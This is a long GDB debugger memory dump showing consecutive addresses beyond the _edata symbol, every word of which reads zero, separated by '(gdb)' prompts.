0x234f0 <_edata+3382>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23500 <_edata+3398>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23510 <_edata+3414>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23520 <_edata+3430>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23530 <_edata+3446>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23540 <_edata+3462>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23550 <_edata+3478>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23560 <_edata+3494>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23570 <_edata+3510>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23580 <_edata+3526>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23590 <_edata+3542>:  0x00000000      0x00000000      0x00000000      0x00000000
0x235a0 <_edata+3558>:  0x00000000      0x00000000      0x00000000      0x00000000
0x235b0 <_edata+3574>:  0x00000000      0x00000000      0x00000000      0x00000000
0x235c0 <_edata+3590>:  0x00000000      0x00000000      0x00000000      0x00000000
0x235d0 <_edata+3606>:  0x00000000      0x00000000      0x00000000      0x00000000
0x235e0 <_edata+3622>:  0x00000000      0x00000000      0x00000000      0x00000000
0x235f0 <_edata+3638>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x23600 <_edata+3654>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23610 <_edata+3670>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23620 <_edata+3686>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23630 <_edata+3702>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23640 <_edata+3718>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23650 <_edata+3734>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23660 <_edata+3750>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23670 <_edata+3766>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23680 <_edata+3782>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23690 <_edata+3798>:  0x00000000      0x00000000      0x00000000      0x00000000
0x236a0 <_edata+3814>:  0x00000000      0x00000000      0x00000000      0x00000000
0x236b0 <_edata+3830>:  0x00000000      0x00000000      0x00000000      0x00000000
0x236c0 <_edata+3846>:  0x00000000      0x00000000      0x00000000      0x00000000
0x236d0 <_edata+3862>:  0x00000000      0x00000000      0x00000000      0x00000000
0x236e0 <_edata+3878>:  0x00000000      0x00000000      0x00000000      0x00000000
0x236f0 <_edata+3894>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23700 <_edata+3910>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23710 <_edata+3926>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23720 <_edata+3942>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23730 <_edata+3958>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23740 <_edata+3974>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23750 <_edata+3990>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23760 <_edata+4006>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23770 <_edata+4022>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x23780 <_edata+4038>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23790 <_edata+4054>:  0x00000000      0x00000000      0x00000000      0x00000000
0x237a0 <_edata+4070>:  0x00000000      0x00000000      0x00000000      0x00000000
0x237b0 <_edata+4086>:  0x00000000      0x00000000      0x00000000      0x00000000
0x237c0 <_edata+4102>:  0x00000000      0x00000000      0x00000000      0x00000000
0x237d0 <_edata+4118>:  0x00000000      0x00000000      0x00000000      0x00000000
0x237e0 <_edata+4134>:  0x00000000      0x00000000      0x00000000      0x00000000
0x237f0 <_edata+4150>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23800 <_edata+4166>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23810 <_edata+4182>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23820 <_edata+4198>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23830 <_edata+4214>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23840 <_edata+4230>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23850 <_edata+4246>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23860 <_edata+4262>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23870 <_edata+4278>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23880 <_edata+4294>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23890 <_edata+4310>:  0x00000000      0x00000000      0x00000000      0x00000000
0x238a0 <_edata+4326>:  0x00000000      0x00000000      0x00000000      0x00000000
0x238b0 <_edata+4342>:  0x00000000      0x00000000      0x00000000      0x00000000
0x238c0 <_edata+4358>:  0x00000000      0x00000000      0x00000000      0x00000000
0x238d0 <_edata+4374>:  0x00000000      0x00000000      0x00000000      0x00000000
0x238e0 <_edata+4390>:  0x00000000      0x00000000      0x00000000      0x00000000
0x238f0 <_edata+4406>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x23900 <_edata+4422>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23910 <_edata+4438>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23920 <_edata+4454>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23930 <_edata+4470>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23940 <_edata+4486>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23950 <_edata+4502>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23960 <_edata+4518>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23970 <_edata+4534>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23980 <_edata+4550>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23990 <_edata+4566>:  0x00000000      0x00000000      0x00000000      0x00000000
0x239a0 <_edata+4582>:  0x00000000      0x00000000      0x00000000      0x00000000
0x239b0 <_edata+4598>:  0x00000000      0x00000000      0x00000000      0x00000000
0x239c0 <_edata+4614>:  0x00000000      0x00000000      0x00000000      0x00000000
0x239d0 <_edata+4630>:  0x00000000      0x00000000      0x00000000      0x00000000
0x239e0 <_edata+4646>:  0x00000000      0x00000000      0x00000000      0x00000000
0x239f0 <_edata+4662>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23a00 <_edata+4678>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23a10 <_edata+4694>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23a20 <_edata+4710>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23a30 <_edata+4726>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23a40 <_edata+4742>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23a50 <_edata+4758>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23a60 <_edata+4774>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23a70 <_edata+4790>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x23a80 <_edata+4806>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23a90 <_edata+4822>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23aa0 <_edata+4838>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23ab0 <_edata+4854>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23ac0 <_edata+4870>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23ad0 <_edata+4886>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23ae0 <_edata+4902>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23af0 <_edata+4918>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23b00 <_edata+4934>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23b10 <_edata+4950>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23b20 <_edata+4966>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23b30 <_edata+4982>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23b40 <_edata+4998>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23b50 <_edata+5014>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23b60 <_edata+5030>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23b70 <_edata+5046>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23b80 <_edata+5062>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23b90 <_edata+5078>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23ba0 <_edata+5094>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23bb0 <_edata+5110>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23bc0 <_edata+5126>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23bd0 <_edata+5142>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23be0 <_edata+5158>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23bf0 <_edata+5174>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x23c00 <_edata+5190>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23c10 <_edata+5206>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23c20 <_edata+5222>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23c30 <_edata+5238>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23c40 <_edata+5254>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23c50 <_edata+5270>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23c60 <_edata+5286>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23c70 <_edata+5302>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23c80 <_edata+5318>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23c90 <_edata+5334>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23ca0 <_edata+5350>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23cb0 <_edata+5366>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23cc0 <_edata+5382>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23cd0 <_edata+5398>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23ce0 <_edata+5414>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23cf0 <_edata+5430>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23d00 <_edata+5446>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23d10 <_edata+5462>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23d20 <_edata+5478>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23d30 <_edata+5494>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23d40 <_edata+5510>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23d50 <_edata+5526>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23d60 <_edata+5542>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23d70 <_edata+5558>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x23d80 <_edata+5574>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23d90 <_edata+5590>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23da0 <_edata+5606>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23db0 <_edata+5622>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23dc0 <_edata+5638>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23dd0 <_edata+5654>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23de0 <_edata+5670>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23df0 <_edata+5686>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23e00 <_edata+5702>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23e10 <_edata+5718>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23e20 <_edata+5734>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23e30 <_edata+5750>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23e40 <_edata+5766>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23e50 <_edata+5782>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23e60 <_edata+5798>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23e70 <_edata+5814>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23e80 <_edata+5830>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23e90 <_edata+5846>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23ea0 <_edata+5862>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23eb0 <_edata+5878>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23ec0 <_edata+5894>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23ed0 <_edata+5910>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23ee0 <_edata+5926>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23ef0 <_edata+5942>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x23f00 <_edata+5958>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23f10 <_edata+5974>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23f20 <_edata+5990>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23f30 <_edata+6006>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23f40 <_edata+6022>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23f50 <_edata+6038>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23f60 <_edata+6054>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23f70 <_edata+6070>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23f80 <_edata+6086>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23f90 <_edata+6102>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23fa0 <_edata+6118>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23fb0 <_edata+6134>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23fc0 <_edata+6150>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23fd0 <_edata+6166>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23fe0 <_edata+6182>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23ff0 <_edata+6198>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24000 <_edata+6214>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24010 <_edata+6230>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24020 <_edata+6246>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24030 <_edata+6262>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24040 <_edata+6278>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24050 <_edata+6294>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24060 <_edata+6310>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24070 <_edata+6326>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x24080 <_edata+6342>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24090 <_edata+6358>:  0x00000000      0x00000000      0x00000000      0x00000000
0x240a0 <_edata+6374>:  0x00000000      0x00000000      0x00000000      0x00000000
0x240b0 <_edata+6390>:  0x00000000      0x00000000      0x00000000      0x00000000
0x240c0 <_edata+6406>:  0x00000000      0x00000000      0x00000000      0x00000000
0x240d0 <_edata+6422>:  0x00000000      0x00000000      0x00000000      0x00000000
0x240e0 <_edata+6438>:  0x00000000      0x00000000      0x00000000      0x00000000
0x240f0 <_edata+6454>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24100 <_edata+6470>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24110 <_edata+6486>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24120 <_edata+6502>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24130 <_edata+6518>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24140 <_edata+6534>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24150 <_edata+6550>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24160 <_edata+6566>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24170 <_edata+6582>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24180 <_edata+6598>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24190 <_edata+6614>:  0x00000000      0x00000000      0x00000000      0x00000000
0x241a0 <_edata+6630>:  0x00000000      0x00000000      0x00000000      0x00000000
0x241b0 <_edata+6646>:  0x00000000      0x00000000      0x00000000      0x00000000
0x241c0 <_edata+6662>:  0x00000000      0x00000000      0x00000000      0x00000000
0x241d0 <_edata+6678>:  0x00000000      0x00000000      0x00000000      0x00000000
0x241e0 <_edata+6694>:  0x00000000      0x00000000      0x00000000      0x00000000
0x241f0 <_edata+6710>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x24200 <_edata+6726>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24210 <_edata+6742>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24220 <_edata+6758>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24230 <_edata+6774>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24240 <_edata+6790>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24250 <_edata+6806>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24260 <_edata+6822>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24270 <_edata+6838>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24280 <_edata+6854>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24290 <_edata+6870>:  0x00000000      0x00000000      0x00000000      0x00000000
0x242a0 <_edata+6886>:  0x00000000      0x00000000      0x00000000      0x00000000
0x242b0 <_edata+6902>:  0x00000000      0x00000000      0x00000000      0x00000000
0x242c0 <_edata+6918>:  0x00000000      0x00000000      0x00000000      0x00000000
0x242d0 <_edata+6934>:  0x00000000      0x00000000      0x00000000      0x00000000
0x242e0 <_edata+6950>:  0x00000000      0x00000000      0x00000000      0x00000000
0x242f0 <_edata+6966>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24300 <_edata+6982>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24310 <_edata+6998>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24320 <_edata+7014>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24330 <_edata+7030>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24340 <_edata+7046>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24350 <_edata+7062>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24360 <_edata+7078>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24370 <_edata+7094>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x24380 <_edata+7110>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24390 <_edata+7126>:  0x00000000      0x00000000      0x00000000      0x00000000
0x243a0 <_edata+7142>:  0x00000000      0x00000000      0x00000000      0x00000000
0x243b0 <_edata+7158>:  0x00000000      0x00000000      0x00000000      0x00000000
0x243c0 <_edata+7174>:  0x00000000      0x00000000      0x00000000      0x00000000
0x243d0 <_edata+7190>:  0x00000000      0x00000000      0x00000000      0x00000000
0x243e0 <_edata+7206>:  0x00000000      0x00000000      0x00000000      0x00000000
0x243f0 <_edata+7222>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24400 <_edata+7238>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24410 <_edata+7254>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24420 <_edata+7270>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24430 <_edata+7286>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24440 <_edata+7302>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24450 <_edata+7318>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24460 <_edata+7334>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24470 <_edata+7350>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24480 <_edata+7366>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24490 <_edata+7382>:  0x00000000      0x00000000      0x00000000      0x00000000
0x244a0 <_edata+7398>:  0x00000000      0x00000000      0x00000000      0x00000000
0x244b0 <_edata+7414>:  0x00000000      0x00000000      0x00000000      0x00000000
0x244c0 <_edata+7430>:  0x00000000      0x00000000      0x00000000      0x00000000
0x244d0 <_edata+7446>:  0x00000000      0x00000000      0x00000000      0x00000000
0x244e0 <_edata+7462>:  0x00000000      0x00000000      0x00000000      0x00000000
0x244f0 <_edata+7478>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x24500 <_edata+7494>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24510 <_edata+7510>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24520 <_edata+7526>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24530 <_edata+7542>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24540 <_edata+7558>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24550 <_edata+7574>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24560 <_edata+7590>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24570 <_edata+7606>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24580 <_edata+7622>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24590 <_edata+7638>:  0x00000000      0x00000000      0x00000000      0x00000000
0x245a0 <_edata+7654>:  0x00000000      0x00000000      0x00000000      0x00000000
0x245b0 <_edata+7670>:  0x00000000      0x00000000      0x00000000      0x00000000
0x245c0 <_edata+7686>:  0x00000000      0x00000000      0x00000000      0x00000000
0x245d0 <_edata+7702>:  0x00000000      0x00000000      0x00000000      0x00000000
0x245e0 <_edata+7718>:  0x00000000      0x00000000      0x00000000      0x00000000
0x245f0 <_edata+7734>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24600 <_edata+7750>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24610 <_edata+7766>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24620 <_edata+7782>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24630 <_edata+7798>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24640 <_edata+7814>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24650 <_edata+7830>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24660 <_edata+7846>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24670 <_edata+7862>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x24680 <_edata+7878>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24690 <_edata+7894>:  0x00000000      0x00000000      0x00000000      0x00000000
0x246a0 <_edata+7910>:  0x00000000      0x00000000      0x00000000      0x00000000
0x246b0 <_edata+7926>:  0x00000000      0x00000000      0x00000000      0x00000000
0x246c0 <_edata+7942>:  0x00000000      0x00000000      0x00000000      0x00000000
0x246d0 <_edata+7958>:  0x00000000      0x00000000      0x00000000      0x00000000
0x246e0 <_edata+7974>:  0x00000000      0x00000000      0x00000000      0x00000000
0x246f0 <_edata+7990>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24700 <_edata+8006>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24710 <_edata+8022>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24720 <_edata+8038>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24730 <_edata+8054>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24740 <_edata+8070>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24750 <_edata+8086>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24760 <_edata+8102>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24770 <_edata+8118>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24780 <_edata+8134>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24790 <_edata+8150>:  0x00000000      0x00000000      0x00000000      0x00000000
0x247a0 <_edata+8166>:  0x00000000      0x00000000      0x00000000      0x00000000
0x247b0 <_edata+8182>:  0x00000000      0x00000000      0x00000000      0x00000000
0x247c0 <_edata+8198>:  0x00000000      0x00000000      0x00000000      0x00000000
0x247d0 <_edata+8214>:  0x00000000      0x00000000      0x00000000      0x00000000
0x247e0 <_edata+8230>:  0x00000000      0x00000000      0x00000000      0x00000000
0x247f0 <_edata+8246>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x24800 <_edata+8262>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24810 <_edata+8278>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24820 <_edata+8294>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24830 <_edata+8310>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24840 <_edata+8326>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24850 <_edata+8342>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24860 <_edata+8358>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24870 <_edata+8374>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24880 <_edata+8390>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24890 <_edata+8406>:  0x00000000      0x00000000      0x00000000      0x00000000
0x248a0 <_edata+8422>:  0x00000000      0x00000000      0x00000000      0x00000000
0x248b0 <_edata+8438>:  0x00000000      0x00000000      0x00000000      0x00000000
0x248c0 <_edata+8454>:  0x00000000      0x00000000      0x00000000      0x00000000
0x248d0 <_edata+8470>:  0x00000000      0x00000000      0x00000000      0x00000000
0x248e0 <_edata+8486>:  0x00000000      0x00000000      0x00000000      0x00000000
0x248f0 <_edata+8502>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24900 <_edata+8518>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24910 <_edata+8534>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24920 <_edata+8550>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24930 <_edata+8566>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24940 <_edata+8582>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24950 <_edata+8598>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24960 <_edata+8614>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24970 <_edata+8630>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x24980 <_edata+8646>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24990 <_edata+8662>:  0x00000000      0x00000000      0x00000000      0x00000000
0x249a0 <_edata+8678>:  0x00000000      0x00000000      0x00000000      0x00000000
0x249b0 <_edata+8694>:  0x00000000      0x00000000      0x00000000      0x00000000
0x249c0 <_edata+8710>:  0x00000000      0x00000000      0x00000000      0x00000000
0x249d0 <_edata+8726>:  0x00000000      0x00000000      0x00000000      0x00000000
0x249e0 <_edata+8742>:  0x00000000      0x00000000      0x00000000      0x00000000
0x249f0 <_edata+8758>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24a00 <_edata+8774>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24a10 <_edata+8790>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24a20 <_edata+8806>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24a30 <_edata+8822>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24a40 <_edata+8838>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24a50 <_edata+8854>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24a60 <_edata+8870>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24a70 <_edata+8886>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24a80 <_edata+8902>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24a90 <_edata+8918>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24aa0 <_edata+8934>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24ab0 <_edata+8950>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24ac0 <_edata+8966>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24ad0 <_edata+8982>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24ae0 <_edata+8998>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24af0 <_edata+9014>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x24b00 <_edata+9030>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24b10 <_edata+9046>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24b20 <_edata+9062>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24b30 <_edata+9078>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24b40 <_edata+9094>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24b50 <_edata+9110>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24b60 <_edata+9126>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24b70 <_edata+9142>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24b80 <_edata+9158>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24b90 <_edata+9174>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24ba0 <_edata+9190>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24bb0 <_edata+9206>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24bc0 <_edata+9222>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24bd0 <_edata+9238>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24be0 <_edata+9254>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24bf0 <_edata+9270>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24c00 <_edata+9286>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24c10 <_edata+9302>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24c20 <_edata+9318>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24c30 <_edata+9334>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24c40 <_edata+9350>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24c50 <_edata+9366>:  0x00000000      0x00000000      0x00000000      0x00000000
